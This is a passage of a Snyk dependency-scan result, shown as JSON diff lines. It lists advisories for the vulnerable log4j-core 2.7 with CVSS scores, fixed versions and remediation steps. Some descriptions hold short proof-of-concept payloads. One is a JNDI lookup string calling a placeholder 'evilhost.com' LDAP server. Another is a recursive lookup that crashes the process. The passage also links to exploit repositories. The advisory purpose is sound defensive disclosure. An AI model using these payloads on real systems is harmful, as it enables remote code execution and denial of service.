"functionName": "lookup" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2021-12-10T10:02:55Z", - "exploitDetails": { - "sources": [ - "CISA", - "ExploitDB", - "Nuclei Templates", - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "High", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Attacked", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.apache.logging.log4j", - "artifactId": "log4j-core" - }, - "publicationTime": "2021-12-10T10:10:01Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-06-03T08:53:25.500242Z", - "socialTrendAlert": false, - "severityWithCritical": "critical", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.apache.logging.log4j:log4j-core@2.7" - ], - "upgradePath": [ - false, - "org.apache.logging.log4j:log4j-core@2.12.2" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.apache.logging.log4j:log4j-core", - "version": "2.7" - }, - { - "id": "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2320014", - "title": "Remote Code Execution (RCE)", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H/E:H/RL:O/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[2.0-beta9,2.3.1)", - "[2.4,2.12.2)", - "[2.13.0,2.16.0)" - ] - }, - "exploit": "High", - "fixedIn": [ - "2.3.1", - "2.12.2", - "2.16.0" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "critical", - "cvssScore": 9, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.apache.logging.log4j:log4j-core", - "references": [ - { - "url": "https://lists.apache.org/thread/83y7dx5xvn3h5290q1twn16tltolv88f", - "title": "Apache Pony Mail" - }, - { - "url": "https://logging.apache.org/log4j/2.x/security.html", - "title": "Apache Security Page" - }, - { - "url": "https://twitter.com/marcioalm/status/1471740771581652995", - "title": "Twitter Post" - }, - { - "url": 
"https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-45046.yaml", - "title": "Nuclei Templates" - }, - { - "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", - "title": "CISA - Known Exploited Vulnerabilities" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", - "cvssV3BaseScore": 9, - "modificationTime": "2024-03-11T09:51:51.455756Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:53:56.296034Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H/E:P/RL:O/RC:C", - "assigner": "Snyk", - "severity": "critical", - "baseScore": 9, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:59:32.295395Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:51.455756Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:56.296034Z" - } - ], - "description": "## Overview\n[org.apache.logging.log4j:log4j-core](http://logging.apache.org/log4j/1.2/) is a logging library for Java.\n\nAffected versions of this package are vulnerable to Remote Code Execution (RCE) if one of the following conditions is met:\r\n\r\n1. Logging configuration explicitly enables lookups – either by default (if using a version lower than 2.15.0) or manually by using `%m{lookups}` as `formatMsgNoLookups` is switched on by default as of version 2.15.0.\r\n2. 
Or uses a non-default Pattern Layout with Context Lookup where attackers can control input data via Thread Context Map (MDC),\r\n3. Or uses `Logger.printf(\"%s\", userInput)` function where attackers can control the userInput variable.\r\n\r\nA malicious actor is able to bypass the mitigation implemented in version 2.15.0 that limits JNDI lookups to localhost only: `${jndi:ldap://127.0.0.1#evilhost.com:1389/a}`.\r\n\r\nWe recommend updating to version 2.16.0 which completely disables JNDI lookups by default. If upgrading is not an option, this issue can be mitigated in prior releases by removing the `JndiLookup` class from the classpath (example: `zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class`).\r\n\r\n### PoC\r\n\r\nIn config:\r\n```\r\n%d %p %c{1.} [%t] $${ctx:loginId} %m%n\r\n```\r\n\r\nIn code:\r\n```java\r\nThreadContext.put(\"loginId\", UserControlledInput);\r\n```\r\n\r\n### History\r\n\r\nThis vulnerability was previously assigned a CVSS score of 3.7 (Low), and the impact was believed to be Denial of Service (DoS).\r\n\r\nFurthermore, the advisory previously mentioned Thread Context Map patterns (%X, %mdc, or %MDC) as being vulnerable to this issue, but that has since been proven wrong.\r\n\r\nOn December 17, 2021 new information came to light, demonstrating that an Arbitrary Code Execution vulnerability still exists in version 2.15.0 of Log4j due to a bypass to the localhost-only lookup mechanism.\n## Remediation\nUpgrade `org.apache.logging.log4j:log4j-core` to version 2.3.1, 2.12.2, 2.16.0 or higher.\n## References\n- [Apache Pony Mail](https://lists.apache.org/thread/83y7dx5xvn3h5290q1twn16tltolv88f)\n- [Apache Security Page](https://logging.apache.org/log4j/2.x/security.html)\n- [Twitter Post](https://twitter.com/marcioalm/status/1471740771581652995)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-45046.yaml)\n- [CISA - Known Exploited 
Vulnerabilities](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)\n", - "epssDetails": { - "percentile": "0.99913", - "probability": "0.97364", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2021-45046" - ], - "CWE": [ - "CWE-94" - ], - "GHSA": [ - "GHSA-7rjr-3q55-vv33" - ] - }, - "packageName": "org.apache.logging.log4j:log4j-core", - "proprietary": false, - "creationTime": "2021-12-14T18:28:31.339218Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2021-12-14T18:01:28Z", - "exploitDetails": { - "sources": [ - "CISA", - "Nuclei Templates", - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "High", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Attacked", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.apache.logging.log4j", - "artifactId": "log4j-core" - }, - "publicationTime": "2021-12-14T18:44:00Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-06-03T08:53:25.837600Z", - "socialTrendAlert": false, - "severityWithCritical": "critical", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.apache.logging.log4j:log4j-core@2.7" - ], - "upgradePath": [ - false, - "org.apache.logging.log4j:log4j-core@2.12.2" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.apache.logging.log4j:log4j-core", - "version": "2.7" - }, - { - "id": "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2321524", - "title": "Denial of Service (DoS)", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P", - "credit": [ - "Hideki Okamoto of Akamai Technologies" - ], - "semver": { - "vulnerable": [ - "[2.0-beta9,2.3.1)", - "[2.4,2.12.3)", - "[2.13.0,2.17.0)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.3.1", - "2.12.3", - "2.17.0" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 7.5, - "functions": [], - 
"malicious": false, - "isDisputed": false, - "moduleName": "org.apache.logging.log4j:log4j-core", - "references": [ - { - "url": "https://logging.apache.org/log4j/2.x/security.html", - "title": "Apache Security" - }, - { - "url": "https://issues.apache.org/jira/browse/LOG4J2-3230", - "title": "JIRA Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 5.9, - "modificationTime": "2024-03-11T09:51:51.570474Z" - }, - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 5.9, - "modificationTime": "2024-03-11T09:53:58.516498Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P", - "assigner": "Snyk", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:59:38.288854Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "NVD", - "severity": "medium", - "baseScore": 5.9, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:51.570474Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 5.9, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:58.516498Z" - } - ], - "description": "## Overview\n[org.apache.logging.log4j:log4j-core](http://logging.apache.org/log4j/1.2/) is a logging library for Java.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS). Does not protect against uncontrolled recursion from self-referential lookups. 
\r\n\r\nWhen the logging configuration uses a non-default Pattern Layout with a Context Lookup (for example, `$${ctx:loginId}`), attackers with control over Thread Context Map (MDC) input data can craft malicious input data that contains a recursive lookup, resulting in a `StackOverflowError` that will terminate the process.\r\n\r\n### PoC\r\n\r\nIn `log4j.properties`:\r\n```java\r\nappender.console.type = Console\r\nappender.console.name = console\r\nappender.console.layout.type = PatternLayout\r\nappender.console.layout.pattern = !${ctx:test}! %m%n\r\nrootLogger.level = ALL\r\nrootLogger.appenderRef.file.ref = console\r\n```\r\n\r\nIn `Main.java`:\r\n```java\r\nThreadContext.put(\"test\", \"${::-${ctx:test}}\");\r\nlogger.error(\"boom\"); // Will not be logged\r\n```\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. 
For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `org.apache.logging.log4j:log4j-core` to version 2.3.1, 2.12.3, 2.17.0 or higher.\n## References\n- [Apache Security](https://logging.apache.org/log4j/2.x/security.html)\n- [JIRA Issue](https://issues.apache.org/jira/browse/LOG4J2-3230)\n", - "epssDetails": { - "percentile": "0.99624", - "probability": "0.96524", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2021-45105" - ], - "CWE": [ - "CWE-400" - ] - }, - "packageName": "org.apache.logging.log4j:log4j-core", - "proprietary": false, - "creationTime": "2021-12-17T18:23:58.542986Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2021-12-17T18:20:21Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.apache.logging.log4j", - "artifactId": "log4j-core" - }, - "publicationTime": "2021-12-18T07:05:00Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:58.516498Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.apache.logging.log4j:log4j-core@2.7" - ], - "upgradePath": [ - false, - "org.apache.logging.log4j:log4j-core@2.12.3" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.apache.logging.log4j:log4j-core", - "version": "2.7" - }, - { - "id": "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2327339", - "title": "Arbitrary Code Execution", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H/E:P", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[2.0-beta7,2.3.2)", - "[2.4,2.12.4)", - "[2.13.0,2.17.1)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.3.2", - "2.12.4", - 
"2.17.1" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 6.6, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.apache.logging.log4j:log4j-core", - "references": [ - { - "url": "https://logging.apache.org/log4j/2.x/security.html", - "title": "Apache Security Page" - }, - { - "url": "https://github.com/apache/logging-log4j2/commit/05db5f9527254632b59aed2a1d78a32c5ab74f16", - "title": "GitHub Commit" - }, - { - "url": "https://issues.apache.org/jira/browse/LOG4J2-3293", - "title": "Jira Issue" - }, - { - "url": "https://www.openwall.com/lists/oss-security/2021/12/28/1", - "title": "Openwall Mail" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 6.6, - "modificationTime": "2024-03-11T09:48:51.766965Z" - }, - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 6.6, - "modificationTime": "2024-03-11T09:53:58.472982Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H/E:P", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 6.6, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:04:47.220633Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "medium", - "baseScore": 6.6, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:51.766965Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 6.6, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:58.472982Z" - } - ], - "description": "## Overview\n[org.apache.logging.log4j:log4j-core](http://logging.apache.org/log4j/1.2/) is a logging 
library for Java.\n\nAffected versions of this package are vulnerable to Arbitrary Code Execution.
**Note:** Even though this vulnerability appears to be related to the [log4Shell vulnerability](https://security.snyk.io/vuln/SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2314720), this vulnerability requires an attacker to have access to modify configurations to be exploitable, which is rarely possible.\r\n\r\nAn attacker with access to modification of logging configuration is able to configure `JDBCAppender` with a data source referencing a JNDI URI - which can execute malicious code.\r\n\r\nIn the fixed versions, `JDBCAppender` is using `JndiManager` and disables JNDI lookups by default (via `log4j2.enableJndiJdbc=false`).\r\n\r\n## Alternative Remediation\r\nIf you have reason to believe your application may be vulnerable and upgrading is not an option, you can either:\r\n\r\n* Disable/remove `JDBCAppender`\r\n* If `JDBCAppender` is used, make sure that it is not configured to use any protocol other than Java\n## Remediation\nUpgrade `org.apache.logging.log4j:log4j-core` to version 2.3.2, 2.12.4, 2.17.1 or higher.\n## References\n- [Apache Security Page](https://logging.apache.org/log4j/2.x/security.html)\n- [GitHub Commit](https://github.com/apache/logging-log4j2/commit/05db5f9527254632b59aed2a1d78a32c5ab74f16)\n- [Jira Issue](https://issues.apache.org/jira/browse/LOG4J2-3293)\n- [Openwall Mail](https://www.openwall.com/lists/oss-security/2021/12/28/1)\n", - "epssDetails": { - "percentile": "0.89602", - "probability": "0.02239", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2021-44832" - ], - "CWE": [ - "CWE-94" - ] - }, - "packageName": "org.apache.logging.log4j:log4j-core", - "proprietary": false, - "creationTime": "2021-12-28T19:42:55.818691Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2021-12-28T19:42:53Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", 
- "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.apache.logging.log4j", - "artifactId": "log4j-core" - }, - "publicationTime": "2021-12-28T20:17:52Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:58.472982Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.apache.logging.log4j:log4j-core@2.7" - ], - "upgradePath": [ - false, - "org.apache.logging.log4j:log4j-core@2.12.4" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.apache.logging.log4j:log4j-core", - "version": "2.7" - }, - { - "id": "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-31409", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:F", - "credit": [ - "Marcio Almeida de Macedo" - ], - "semver": { - "vulnerable": [ - "[,2.8.2)" - ] - }, - "exploit": "Functional", - "fixedIn": [ - "2.8.2" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "critical", - "cvssScore": 9.8, - "functions": [ - { - "version": [ - "[,2.8.2)" - ], - "functionId": { - "filePath": "org/apache/logging/log4j/core/net/server/TcpSocketServer.java", - "className": "TcpSocketServer", - "functionName": "createSerializedSocketServer" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "org.apache.logging.log4j:log4j-core", - "references": [ - { - "url": "https://github.com/pimps/CVE-2017-5645", - "title": "Exploit" - }, - { - "url": "https://github.com/apache/logging-log4j2/commit/5dcc19215827db29c993d0305ee2b0d8dd05939d", - "title": "GitHub Commit" - }, - { - "url": "https://issues.apache.org/jira/browse/LOG4J2-1863", - "title": "Jira Issue" - }, - { - "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-5645", - "title": "NVD" - }, - { - "url": 
"https://github.com/projectdiscovery/nuclei-templates/blob/master/network/cves/2017/CVE-2017-5645.yaml", - "title": "Nuclei Templates" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:47:27.296331Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:53:54.838012Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:F", - "assigner": "Snyk", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:57:08.335550Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:47:27.296331Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:54.838012Z" - } - ], - "description": "## Overview\n[org.apache.logging.log4j:log4j-core](http://logging.apache.org/log4j/1.2/) is a logging library for Java.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. When using the TCP socket server or UDP socket server to receive serialized log events from another application, a specially crafted binary payload can be sent that, when deserialized, can execute arbitrary code.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. 
Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. 
By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `org.apache.logging.log4j:log4j-core` to version 2.8.2 or higher.\n## References\n- [Exploit](https://github.com/pimps/CVE-2017-5645)\n- [GitHub Commit](https://github.com/apache/logging-log4j2/commit/5dcc19215827db29c993d0305ee2b0d8dd05939d)\n- [Jira Issue](https://issues.apache.org/jira/browse/LOG4J2-1863)\n- [NVD](https://nvd.nist.gov/vuln/detail/CVE-2017-5645)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/network/cves/2017/CVE-2017-5645.yaml)\n", - "epssDetails": { - "percentile": "0.98601", - "probability": "0.87384", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2017-5645" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-fxph-q3j8-mv87" - ] - }, - "packageName": "org.apache.logging.log4j:log4j-core", - "proprietary": false, - "creationTime": "2017-05-17T12:10:22.545000Z", - "functions_new": [ - { - "version": [ - "[,2.8.2)" - ], - "functionId": { - "className": "org.apache.logging.log4j.core.net.server.TcpSocketServer", - "functionName": "createSerializedSocketServer" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2017-04-01T21:00:00Z", - "exploitDetails": { - "sources": [ - "Nuclei Templates", - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Functional", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.apache.logging.log4j", - "artifactId": "log4j-core" - }, - "publicationTime": "2017-05-21T07:52:37Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-06-03T08:53:27.233939Z", - "socialTrendAlert": false, - "severityWithCritical": "critical", - "from": [ - 
"io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.apache.logging.log4j:log4j-core@2.7" - ], - "upgradePath": [ - false, - "org.apache.logging.log4j:log4j-core@2.8.2" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.apache.logging.log4j:log4j-core", - "version": "2.7" - }, - { - "id": "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-567761", - "title": "Man-in-the-Middle (MitM)", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.13.2)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.13.2" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "low", - "cvssScore": 3.7, - "functions": [ - { - "version": [ - "[2.6,2.13.2)" - ], - "functionId": { - "filePath": "org/apache/logging/log4j/core/net/SmtpManager.java", - "className": "SmtpManager", - "functionName": "getSmtpManager" - } - }, - { - "version": [ - "[2.0-rc2,2.5)" - ], - "functionId": { - "filePath": "org/apache/logging/log4j/core/net/SmtpManager.java", - "className": "SmtpManager", - "functionName": "getSMTPManager" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "org.apache.logging.log4j:log4j-core", - "references": [ - { - "url": "https://confluence.atlassian.com/jirakb/list-of-security-vulnerabilities-addressed-in-atlassian-log4j1-1141965553.html", - "title": "Atlassian Patch" - }, - { - "url": "https://github.com/apache/logging-log4j2/commit/6851b5083ef9610bae320bf07e1f24d2aa08851b", - "title": "GitHub Commit" - }, - { - "url": "https://issues.apache.org/jira/browse/LOG4J2-2819", - "title": "Jira Issue" - }, - { - "url": "https://github.com/qos-ch/reload4j/commit/90bc7826c206c256ee9ec6b51318cc1865cc19e9", - "title": "Reload4j Fix Commit" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "low", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N", - "cvssV3BaseScore": 3.7, - "modificationTime": 
"2024-03-11T09:51:18.869400Z" - }, - { - "assigner": "Red Hat", - "severity": "low", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N", - "cvssV3BaseScore": 3.7, - "modificationTime": "2024-03-11T09:53:58.100685Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N", - "assigner": "Snyk", - "severity": "low", - "baseScore": 3.7, - "cvssVersion": "3.1", - "modificationTime": "2024-03-14T11:19:13.272608Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N", - "assigner": "NVD", - "severity": "low", - "baseScore": 3.7, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:18.869400Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N", - "assigner": "Red Hat", - "severity": "low", - "baseScore": 3.7, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:58.100685Z" - } - ], - "description": "## Overview\n[org.apache.logging.log4j:log4j-core](http://logging.apache.org/log4j/1.2/) is a logging library for Java.\n\nAffected versions of this package are vulnerable to Man-in-the-Middle (MitM). Improper validation of certificate with host mismatch in Apache Log4j SMTP appender. 
This could allow an SMTPS connection to be intercepted by a man-in-the-middle attack which could leak any log messages sent through that appender.\n## Remediation\nUpgrade `org.apache.logging.log4j:log4j-core` to version 2.13.2 or higher.\n## References\n- [Atlassian Patch](https://confluence.atlassian.com/jirakb/list-of-security-vulnerabilities-addressed-in-atlassian-log4j1-1141965553.html)\n- [GitHub Commit](https://github.com/apache/logging-log4j2/commit/6851b5083ef9610bae320bf07e1f24d2aa08851b)\n- [Jira Issue](https://issues.apache.org/jira/browse/LOG4J2-2819)\n- [Reload4j Fix Commit](https://github.com/qos-ch/reload4j/commit/90bc7826c206c256ee9ec6b51318cc1865cc19e9)\n", - "epssDetails": { - "percentile": "0.56903", - "probability": "0.00191", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-9488" - ], - "CWE": [ - "CWE-297" - ], - "GHSA": [ - "GHSA-vwqq-5vrc-xw9h" - ] - }, - "packageName": "org.apache.logging.log4j:log4j-core", - "proprietary": false, - "creationTime": "2020-04-28T15:10:06.231410Z", - "functions_new": [ - { - "version": [ - "[2.6,2.13.2)" - ], - "functionId": { - "className": "org.apache.logging.log4j.core.net.SmtpManager", - "functionName": "getSmtpManager" - } - }, - { - "version": [ - "[2.0-rc2,2.5)" - ], - "functionId": { - "className": "org.apache.logging.log4j.core.net.SmtpManager", - "functionName": "getSMTPManager" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-04-27T17:16:14Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": 